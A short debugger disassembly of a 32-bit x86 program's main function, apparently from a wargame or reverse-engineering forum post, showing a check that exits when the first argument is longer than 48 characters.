0x80485b0 <main+176>:        mov    %eax,DWORD PTR [%ebp+12]
0x80485b3 <main+179>:        add    %eax,4
0x80485b6 <main+182>:        mov    %edx,DWORD PTR [%eax]
0x80485b8 <main+184>:        push   %edx
0x80485b9 <main+185>:        call   0x80483f0 <strlen>
0x80485be <main+190>:        add    %esp,4
0x80485c1 <main+193>:        mov    %eax,%eax
0x80485c3 <main+195>:        cmp    %eax,48
0x80485c6 <main+198>:        jbe    0x80485e0 <main+224>
0x80485c8 <main+200>:        push   0x80486c0
0x80485cd <main+205>:        call   0x8048410 <printf>
0x80485d2 <main+210>:        add    %esp,4
0x80485d5 <main+213>:        push   0
0x80485d7 <main+215>:        call   0x8048420 <exit>

  Hit : 1070     Date : 2025/07/07 08:04